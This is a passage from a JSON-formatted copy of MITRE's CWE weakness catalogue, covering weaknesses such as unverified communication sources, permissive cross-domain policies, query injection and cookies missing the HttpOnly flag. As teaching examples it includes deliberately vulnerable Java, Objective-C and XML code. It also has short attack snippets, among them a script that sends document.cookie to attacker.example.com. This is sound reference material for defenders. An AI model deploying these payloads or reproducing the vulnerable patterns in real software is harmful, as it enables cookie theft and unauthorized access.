file"}],"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"&lt;iframe src=\\"appscheme://replaceFileText?file=Bookmarks.dat&amp;text=listOfMaliciousWebsites\\"&gt;"}]},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5725","Description":"URL scheme has action replace which requires no user prompt and allows remote attackers to perform undesired actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5725"},{"Reference":"CVE-2013-5726","Description":"URL scheme has action follow and favorite which allows remote attackers to force user to perform undesired actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5726"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-938"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-01-14"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"940":{"attr":{"@_ID":"940","@_Name":"Improper Verification of Source of a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.","Extended_Description":"When an attacker can successfully establish a communication channel from an untrusted origin, the attacker may be able to gain privileges and access unexpected functionality.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Varies by Context"],"Note":"An attacker can access any functionality that is inadvertently accessible to the source."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack.","When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-112"},"Intro_Text":"This Android application will remove a user account when it receives an intent to do so:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.RemoveUser\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class DeleteReceiver extends BroadcastReceiver {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"int userID = intent.getIntExtra(\\"userID\\");destroyUserData(userID);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}},"Body_Text":"This application does not check the origin of the intent, thus allowing any malicious application to remove a user. Always check the origin of an intent, or create an allowlist of trusted applications using the manifest.xml file."},{"attr":{"@_Demonstrative_Example_ID":"DX-109"},"Intro_Text":"These Android and iOS applications intercept URL loading within a WebView and perform special actions if a particular URL scheme is used, thus allowing the Javascript within the WebView to communicate with the application:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Overridepublic boolean shouldOverrideUrlLoading(WebView view, String url){}","xhtml:i":"// Android","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (url.substring(0,14).equalsIgnoreCase(\\"examplescheme:\\")){}","xhtml:div":{"#text":"if(url.substring(14,25).equalsIgnoreCase(\\"getUserInfo\\")){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"writeDataToView(view, UserData);return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"return true;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}},{"attr":{"@_Nature":"bad","@_Language":"Objective-C"},"xhtml:div":{"#text":"-(BOOL) webView:(UIWebView *)exWebView shouldStartLoadWithRequest:(NSURLRequest *)exRequest navigationType:(UIWebViewNavigationType)exNavigationType{}","xhtml:i":"// iOS","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSURL *URL = [exRequest URL];if ([[URL scheme] isEqualToString:@\\"exampleScheme\\"]){}return YES;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"NSString *functionString = [URL resourceSpecifier];if ([functionString hasPrefix:@\\"specialFunction\\"]){}return NO;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UIWebView *webView = [self writeDataToView:[URL query]];","xhtml:br":["",""],"xhtml:i":"// Make data available back in webview."}}}}}}}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"window.location = examplescheme://method?parameter=value"}],"Body_Text":["A call into native code can then be initiated by passing parameters within the URL:","Because the application does not check the source, a malicious website loaded within this WebView has the same access to the API as a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1218","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1218"},{"Reference":"CVE-2005-0877","Description":"DNS server can accept DNS updates from hosts that it did not query, leading to cache poisoning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0877"},{"Reference":"CVE-2001-1452","Description":"DNS server caches glue records received from non-delegated name servers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1452"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"594"}},{"attr":{"@_CAPEC_ID":"595"}},{"attr":{"@_CAPEC_ID":"596"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-324"}}},"Notes":{"Note":{"#text":"While many access control issues involve authenticating the user, this weakness is more about authenticating the actual source of the communication channel itself; there might not be any \\"user\\" in such cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"941":{"attr":{"@_ID":"941","@_Name":"Incorrectly Specified Destination in a Communication Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software creates a communication channel to initiate an outgoing request to an actor, but it does not correctly specify the intended destination for that actor.","Extended_Description":{"xhtml:p":["Attackers at the destination may be able to spoof trusted servers to steal data or cause a denial of service.","There are at least two distinct weaknesses that can cause the software to communicate with an unintended destination:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["If the software allows an attacker to control which destination is specified, then the attacker can cause it to connect to an untrusted or malicious destination. For example, because UDP is a connectionless protocol, UDP packets can be spoofed by specifying a false source address in the packet; when the server receives the packet and sends a reply, it will specify a destination by using the source of the incoming packet - i.e., the false source. The server can then be tricked into sending traffic to the wrong host, which is effective for hiding the real source of an attack and for conducting a distributed denial of service (DDoS). As another example, server-side request forgery (SSRF) and XML External Entity (XXE) can be used to trick a server into making outgoing requests to hosts that cannot be directly accessed by the attacker due to firewall restrictions.","If the software incorrectly specifies the destination, then an attacker who can control this destination might be able to spoof trusted servers. While the most common occurrence is likely due to misconfiguration by an administrator, this can be resultant from other weaknesses. For example, the software might incorrectly parse an e-mail or IP address and send sensitive data to an unintended destination. As another example, an Android application may use a \\"sticky broadcast\\" to communicate with a receiver for a particular application, but since sticky broadcasts can be processed by *any* receiver, this can allow a malicious application to access restricted data that was only intended for a different application."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"406","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"},{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-941"}},{"attr":{"@_External_Reference_ID":"REF-942"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-02-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"942":{"attr":{"@_ID":"942","@_Name":"Permissive Cross-domain Policy with Untrusted Domains","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cross-domain policy file that includes domains that should not be trusted.","Extended_Description":{"xhtml:p":["A cross-domain policy file (\\"crossdomain.xml\\" in Flash and \\"clientaccesspolicy.xml\\" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made.","Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains.","An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim\'s machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site.","In many cases, the attack can be launched without the victim even being aware of it."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"183","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Varies by Context"],"Note":"An attacker may be able to bypass the web browser\'s same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."},{"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":"For Flash, modify crossdomain.xml to use meta-policy options such as \'master-only\' or \'none\' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These cross-domain policy files mean to allow Flash and Silverlight applications hosted on other domains to access its data:","Body_Text":["Flash crossdomain.xml :","Silverlight clientaccesspolicy.xml :","These entries are far too permissive, allowing any Flash or Silverlight application to send requests. A malicious application hosted on any other web site will be able to send requests on behalf of any user tricked into executing it."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;cross-domain-policy xmlns:xsi=\\"http://www.w3.org/2001/XMLSchema-instance\\"xsi:noNamespaceSchemaLocation=\\"http://www.adobe.com/xml/schemas/PolicyFile.xsd\\"&gt;&lt;allow-access-from domain=\\"*.example.com\\"/&gt;&lt;allow-access-from domain=\\"*\\"/&gt;&lt;/cross-domain-policy&gt;","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"&lt;?xml version=\\"1.0\\" encoding=\\"utf-8\\"?&gt;&lt;access-policy&gt;&lt;cross-domain-access&gt;&lt;policy&gt;&lt;allow-from http-request-headers=\\"SOAPAction\\"&gt;&lt;domain uri=\\"*\\"/&gt;&lt;/allow-from&gt;&lt;grant-to&gt;&lt;resource path=\\"/\\" include-subpaths=\\"true\\"/&gt;&lt;/grant-to&gt;&lt;/policy&gt;&lt;/cross-domain-access&gt;&lt;/access-policy&gt;","xhtml:br":["","","","","","","","","","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-2292","Description":"Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2292"},{"Reference":"CVE-2014-2049","Description":"The default Flash Cross Domain policies in a product allows remote attackers to access user files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2049"},{"Reference":"CVE-2007-6243","Description":"Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243"},{"Reference":"CVE-2008-4822","Description":"Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4822"},{"Reference":"CVE-2010-3636","Description":"Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3636"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-943"}},{"attr":{"@_External_Reference_ID":"REF-944"}},{"attr":{"@_External_Reference_ID":"REF-945"}},{"attr":{"@_External_Reference_ID":"REF-946"}},{"attr":{"@_External_Reference_ID":"REF-947"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-05","Submission_Comment":"Created by MITRE with input from members of the CWE-Research mailing list."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description, Name"}],"Previous_Entry_Name":{"#text":"Overly Permissive Cross-domain Whitelist","attr":{"@_Date":"2020-02-26"}}}},"943":{"attr":{"@_ID":"943","@_Name":"Improper Neutralization of Special Elements in Data Query Logic","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application generates a query intended to access or manipulate data in a data store such as a database, but it does not neutralize or incorrectly neutralizes special elements that can modify the intended logic of the query.","Extended_Description":{"xhtml:p":["Depending on the capabilities of the query language, an attacker could inject additional logic into the query to:","The ability to execute additional commands or change which entities are returned has obvious risks. But when the application logic depends on the order or number of entities, this can also lead to vulnerabilities. For example, if the application query expects to return only one entity that specifies an administrative user, but an attacker can change which entities are returned, this could cause the logic to return information for a regular user and incorrectly assume that the user has administrative privileges.","While this weakness is most commonly associated with SQL injection, there are many other query languages that are also subject to injection attacks, including HTSQL, LDAP, DQL, XQuery, Xpath, and \\"NoSQL\\" languages."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Modify the intended selection criteria, thus changing which data entities (e.g., records) are returned, modified, or otherwise manipulated","Append additional commands to the query","Return more entities than intended","Return fewer entities than intended","Cause entities to be sorted in an unexpected way"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Bypass Protection Mechanism","Read Application Data","Modify Application Data","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2503","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2503"},{"Reference":"CVE-2014-2508","Description":"Injection using Documentum Query Language (DQL)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2508"}]},"Notes":{"Note":{"#text":"It could be argued that data query languages are effectively a command language - albeit with a limited set of commands - and thus any query-language injection issue could be treated as a child of CWE-74. However, CWE-943 is intended to better organize query-oriented issues to separate them from fully-functioning programming languages, and also to provide a more precise identifier for the many query languages that do not have their own CWE identifier.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2014-06-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1004":{"attr":{"@_ID":"1004","@_Name":"Sensitive Cookie Without \'HttpOnly\' Flag","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.","Extended_Description":"The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker\'s script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"732","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"An HTTP cookie is a small piece of data attributed to a specific website and stored on the user\'s computer by the user\'s web browser. This data can be leveraged for a variety of purposes including saving information entered into form fields, recording user activity, and for authentication purposes. Cookies used to save or record information generated by the user are accessed and modified by script code embedded in a web page. While cookies used for authentication are created by the website\'s server and sent to the user to be attached to future requests. These authentication cookies are often not meant to be accessed by the web page sent to the user, and are instead just supposed to be attached to future requests to verify authentication details."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties."},{"Scope":"Integrity","Impact":"Gain Privileges or Assume Identity","Note":"If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Leverage the HttpOnly flag when setting a sensitive cookie in a response.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.","Body_Text":["The snippet of code below establishes a new cookie to hold the sessionID.","The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:","When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.","To mitigate the risk, use the setHttpOnly(true) method."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);response.addCookie(c);","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"JavaScript"},"xhtml:div":"document.write(\'&lt;img src=\\"http://attacker.example.com/collect-cookies?cookie=\' + document.cookie . \'\\"&gt;\'"},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String sessionID = generateSessionId();Cookie c = new Cookie(\\"session_id\\", sessionID);c.setHttpOnly(true);response.addCookie(c);","xhtml:br":["","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-3852","Description":"CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3852"},{"Reference":"CVE-2015-4138","Description":"Appliance for managing encrypted communications does not use HttpOnly flag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4138"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-2"}},{"attr":{"@_External_Reference_ID":"REF-3"}},{"attr":{"@_External_Reference_ID":"REF-4"}},{"attr":{"@_External_Reference_ID":"REF-5"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2017-01-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}]}},"1007":{"attr":{"@_ID":"1007","@_Name":"Insufficient Visual Distinction of Homoglyphs Presented to User","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action.","Extended_Description":{"xhtml:p":["Some glyphs, pictures, or icons can be semantically distinct to a program, while appearing very similar or identical to a human user. These are referred to as homoglyphs. For example, the lowercase \\"l\\" (ell) and uppercase \\"I\\" (eye) have different character codes, but these characters can be displayed in exactly the same way to a user, depending on the font. This can also occur between different character sets. For example, the Latin capital letter \\"A\\" and the Greek capital letter \\"\u0391\\" (Alpha) are treated as distinct by programs, but may be 